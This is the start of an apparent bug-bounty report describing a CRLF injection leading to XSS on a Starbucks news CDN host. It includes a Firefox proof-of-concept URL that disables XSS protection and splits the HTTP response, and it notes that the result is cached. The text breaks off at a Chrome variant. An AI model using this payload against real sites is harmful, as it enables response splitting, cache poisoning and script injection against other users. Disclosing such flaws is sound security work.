Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS

PoC FireFox http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%0d%0a0%0d%0a/%2e%2e After sending the request through FireFox this query is saved in cache and using a small trick can be made to work it in another browser. PoC Chrome Make sure you send...